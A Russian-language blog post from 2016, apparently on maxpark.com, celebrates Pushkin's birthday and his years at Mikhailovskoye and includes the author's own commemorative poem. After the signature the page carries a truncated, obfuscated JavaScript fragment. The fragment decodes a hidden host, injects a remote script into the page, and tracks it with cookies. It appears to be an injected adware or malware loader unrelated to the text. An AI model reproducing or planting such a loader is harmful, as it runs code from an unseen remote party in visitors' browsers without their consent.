"Июнь в русском сердце" Сергей Сокуров

На модерации Отложенный
Июнь в русском сердце
Сергей Сокуров
3 июня 2016 4
217 и 190

 

Алине Ухановой и Ольге Шаховой

Нет, не о 12-ом дне июня здесь речь. Для меня «дней России» в году – 365, временами – на день больше, а что до «праздника  независимости», то  празднуем его уже с 1480 года,  показав через реку Угру язык хану Ахмату: вот те, казанский сирота, последняя дань! Пора и передышку сделать.  Есть в июне день, памятный с 1799 года. Правда, 217 лет тому назад он случился в конце мая, но за эту неразбериху поблагодарим реформаторов нашего календаря.

 События последних лет – Украина, Крым, Сирия, санкции,  экономический кризис - настолько наполняют умы и сердца, что всё иное,  достойное внимание и отклика, воспринимается второстепенным. Сюда относятся события  давние, которые, полагают многие, необязательно помнить.  Но помнятся, никуда от них не денешься.

 Вот, например, 6 июня   исполняется 217 лет Пушкину.  И 190 ровно годков  тому лету, которое стало  последним в абсолютно вольном двухлетии  ссыльного острословца. Ведь так называемая «Михайловская ссылка»  обернулась небывалой творческой свободой.  Спасибо «тирану» Александру I!  И от Пушкина спасибо, и от русской литературы. Покоритель Парижа и основатель Царскосельского лицея вольно или невольно (не имеет значения) буквально спас юное, ещё нравственно не окрепшее дарование от развратной, убивающей драгоценное время столицы, переместив его в пространство, наполненное  разнообразными впечатлениями.

 27-ю годами раньше младенец, крещённый Александром, появился в семье моэораСергея Львовича Пушкина в Москве. Но зрелого творца художественного слова подарило  России позже псковское Святогорье, сельцо Михайловское, что в 5-и верстах от обители. 

 Некоторые из нас способны на низкий вопрос: «А при чём здесь лирик Пушкин, когда вокруг довлеет суровая «проза жизни»?».  Охотно поясню: от Александра Пушкина «пошла есть» не только зрелая поэзия, от лирической до гражданской. Он прозаик и драматург,  глубокий публицист, историк и мыслитель. Он действительно «наше всё»,  о чём догадался ещё при его жизни проницательный Гоголь.  Казалось бы, ну что можно заимствовать у Пушкина,  ведя речь о нынешних событиях на Украине или на Ближнем Востоке. Не знаю, как  обходитесь вы, но я нередко ссылаюсь на Пушкина в своих статьях на злобу дня, вообще, в сочинениях,  разных по жанру и теме. Но сегодня позволю себе ограничиться своим.

 

***

Июньским утром, на рассвете,

я, волей Неба трижды дед,

проснусь, бывает, в кабинете,

когда иного места нет.

 

Сказав адьё своей подушке,

на календарь бросаю взгляд,

чтоб день шестой (родился Пушкин!)

не прозевать, как говорят.

 

Да, для меня тот день особый

(надеюсь, также и для вас) –

для сердца испытанье-проба

на чувства добрые подчас.

 

Мечтою, с детства окрылённой,

лечу к Нему. В Святых Горах,

близ  храма, у стены белёной

покоится под камнем прах.

 

Живой, звучит словами, дышит,

ведёт тропой старинных рощ

в обитель под тесовой крышей,

куда паломник всякий вхож.

 

И каждому дана возможность

с поэтом встречи, тет-а-тет,

Коль с чувством искренним, не ложным,

пришёл сюда, поэту вслед.

 

Смотри вокруг, внимая гиду,

И вместе с тем – в себя смотри.

Ну как, настроился? Ты видишь

на взгорке сосны? Сразу три.

 

А Он в рубашке, с непокрытой

бедовой, тёмной головой,

несёт подмышкою корыто -

от Рыбки дар  старухе злой.

 

Меня узрев, рукою машет,

мол, подсоби.  Я рад помочь.

Далёк наш путь, средь рощ и пашен

аж к Лукоморью, день и ночь.

 

… Чтоб видеть так, одно есть средство.

Охотно открываюсь вам:

ступайте с Пушкиным от детства,

внимайте  Пушкинским словам.

 

Когда скитался я по свету,

раскрыл мне пред глазами Бог

в краю полуночном планеты

чудесный псковский уголок.

 

И я узнал! – Святые Горы

и рощи в пене ветровой,

извивы Сороти, озёра

меж гор в низине луговой,

 

и дом с колоннами-столбами,

и круг дерновый во дворе.

Всё это видели вы сами

над тихой речкой, на горе.

 

А я там  мыслями. Стараюсь

услышать оклик. Чую: Он!

Стою, с волненьем озираюсь,

но слышен зов со всех сторон -

 

от вековых  гигантов-елей,

из груды мшистых валунов,

из сада, с  липовой аллеи,

с покрытых ряскою прудов.

 

Под сводами древесной сени

плывут виденья, рифмы звон.

И в очертаниях каждой тени,

куда ни глянь, повсюду Он.

 

 Со светлым днём 6 июня, соотечественники!  Да освободятся наши души хотя бы на  тот день от злого!

Сокуров.

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>